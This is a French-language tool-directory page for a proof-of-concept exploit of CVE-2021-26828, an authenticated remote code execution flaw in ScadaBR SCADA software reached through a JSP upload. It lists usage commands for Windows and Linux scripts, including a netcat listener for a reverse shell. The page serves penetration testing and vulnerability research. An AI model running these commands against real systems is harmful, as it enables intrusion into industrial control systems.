Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-26828_ScadaBR_RCE — Exploit de preuve de concept pour CVE-2021-26828 permettant l'exécution de code à distance authentifiée sur les systèmes SCADA ScadaBR via le téléchargement de fichiers JSP. Prend en charge les cibles Windows et Linux avec des charges utiles de shell inversé. | Kitploit
Outils/GitHubGitHub/hev0x/cve-2021-26828_scadabr_rce
Analyse des VulnérabilitésExploitationSécurité SCADA/ICSExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHubhev0x/cve-2021-26828_scadabr_rce

CVE-2021-26828_ScadaBR_RCE

Exploit de preuve de concept pour CVE-2021-26828 permettant l'exécution de code à distance authentifiée sur les systèmes SCADA ScadaBR via le téléchargement de fichiers JSP. Prend en charge les cibles Windows et Linux avec des charges utiles de shell inversé.

Voir le dépôt
9423il y a 5 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

POC CVE-2021-26828_ScadaBR_RemoteCodeExecution

  • ScadaBR 0.9.1 sur Linux et jusqu'à 1.0 et 1.12.4CE sur Windows permet aux utilisateurs authentifiés à distance de télécharger et d'exécuter des fichiers JSP arbitraires via 'view_edit.shtm' et une exécution de code à distance.

Utilisation de l'exploit

Commandes :

  • Windows : $ sudo python WinScada_RCE.py <Remote_Host> <Remote_Port> <User> <Pass>

  • Linux : Ouvrez d'abord un port sur votre machine locale avant d'exécuter l'exploit :

$ sudo nc -vnlp 4444

$ sudo python LinScada_RCE.py <Remote_Host> <Remote_Port> <User> <Pass> <Reverse_IP> <Reverse_Port>

  • Références :

    https://www.exploit-db.com/exploits/49734

    https://www.exploit-db.com/exploits/49735

    https://www.youtube.com/watch?v=k1teIStQr1A

Télécharger l’outil